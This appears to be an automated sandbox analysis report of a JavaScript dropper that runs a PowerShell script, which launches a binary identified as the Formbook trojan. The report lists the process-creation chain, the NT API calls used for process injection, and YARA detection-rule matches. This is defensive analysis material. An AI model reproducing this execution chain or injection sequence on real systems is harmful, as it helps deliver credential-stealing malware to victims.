Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2F30 NtCreateSection,	4_2_019C2F30
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2F60 NtCreateProcessEx,	4_2_019C2F60
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2E80 NtReadVirtualMemory,	4_2_019C2E80
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2EA0 NtAdjustPrivilegesToken,	4_2_019C2EA0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2EE0 NtQueueApcThread,	4_2_019C2EE0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C2E30 NtWriteVirtualMemory,	4_2_019C2E30

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_01450848	3_2_01450848
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_01453028	3_2_01453028
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_0145422E	3_2_0145422E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0040F8F3	4_2_0040F8F3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_004011D0	4_2_004011D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_004161DE	4_2_004161DE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_004161E3	4_2_004161E3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00402188	4_2_00402188
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00402190	4_2_00402190
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0040FB13	4_2_0040FB13
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0040DB93	4_2_0040DB93
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00402D75	4_2_00402D75
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00402510	4_2_00402510
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0042E513	4_2_0042E513
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00402D80	4_2_00402D80
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A501AA	4_2_01A501AA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0199B1B0	4_2_0199B1B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A481CC	4_2_01A481CC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01980100	4_2_01980100
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2A118	4_2_01A2A118
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A5B16B	4_2_01A5B16B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C516C	4_2_019C516C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A18158	4_2_01A18158
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4F0E0	4_2_01A4F0E0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A470E9	4_2_01A470E9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3F0CC	4_2_01A3F0CC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019D739A	4_2_019D739A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A503E6	4_2_01A503E6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0199E3F0	4_2_0199E3F0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4132D	4_2_01A4132D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197D34C	4_2_0197D34C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4A352	4_2_01A4A352
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019952A0	4_2_019952A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A312ED	4_2_01A312ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AB2C0	4_2_019AB2C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30274	4_2_01A30274
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2D5B0	4_2_01A2D5B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A50591	4_2_01A50591
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01990535	4_2_01990535
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A47571	4_2_01A47571
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3E4F6	4_2_01A3E4F6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4F43F	4_2_01A4F43F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A42446	4_2_01A42446
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01981460	4_2_01981460
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4F7B0	4_2_01A4F7B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198C7C0	4_2_0198C7C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B4750	4_2_019B4750
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01990770	4_2_01990770
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A416CC	4_2_01A416CC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AC6E0	4_2_019AC6E0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A5A9A6	4_2_01A5A9A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019929A0	4_2_019929A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01999950	4_2_01999950
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AB950	4_2_019AB950
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A6962	4_2_019A6962
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019768B8	4_2_019768B8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BE8F0	4_2_019BE8F0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019938E0	4_2_019938E0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019FD800	4_2_019FD800
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01992840	4_2_01992840
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0199A840	4_2_0199A840
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AFB80	4_2_019AFB80
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A05BF0	4_2_01A05BF0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019CDBF9	4_2_019CDBF9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A46BD7	4_2_01A46BD7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4FB76	4_2_01A4FB76
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4AB40	4_2_01A4AB40
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2DAAC	4_2_01A2DAAC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198EA80	4_2_0198EA80
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019D5AA0	4_2_019D5AA0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3DAC6	4_2_01A3DAC6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A03A6C	4_2_01A03A6C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A47A46	4_2_01A47A46
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4FA49	4_2_01A4FA49
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A8DBF	4_2_019A8DBF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AFDC0	4_2_019AFDC0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198ADE0	4_2_0198ADE0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0199AD00	4_2_0199AD00
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A47D73	4_2_01A47D73
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01993D40	4_2_01993D40
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A41D5A	4_2_01A41D5A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A30CB5	4_2_01A30CB5
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4FCF2	4_2_01A4FCF2
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01980CF2	4_2_01980CF2
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A09C32	4_2_01A09C32
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01990C00	4_2_01990C00
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991F92	4_2_01991F92
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4FFB1	4_2_01A4FFB1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01982FC8	4_2_01982FC8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B0F30	4_2_019B0F30
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4FF09	4_2_01A4FF09
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019D2F28	4_2_019D2F28
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A04F40	4_2_01A04F40
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A2E90	4_2_019A2E90
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01999EB0	4_2_01999EB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4CE93	4_2_01A4CE93
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4EEDB	4_2_01A4EEDB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4EE26	4_2_01A4EE26
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01990E59	4_2_01990E59

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 0197B970 appears 253 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 019D7E54 appears 89 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 019FEA12 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 019C5130 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 01A0F290 appears 105 times

Source: TT copy.js

Initial sample: Strings found which are bigger than 50

Source: 4.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.x.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6896, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.expl.evad.winJS@8/7@1/1

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ugok5m[1].ps1

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03

Source: C:\Windows\System32\wscript.exe

File created: C:\Temp\dddddd.ps1

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: FREAKY.pdb source: x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1863261944.0000000005580000.00000004.08000000.00040000.00000000.sdmp
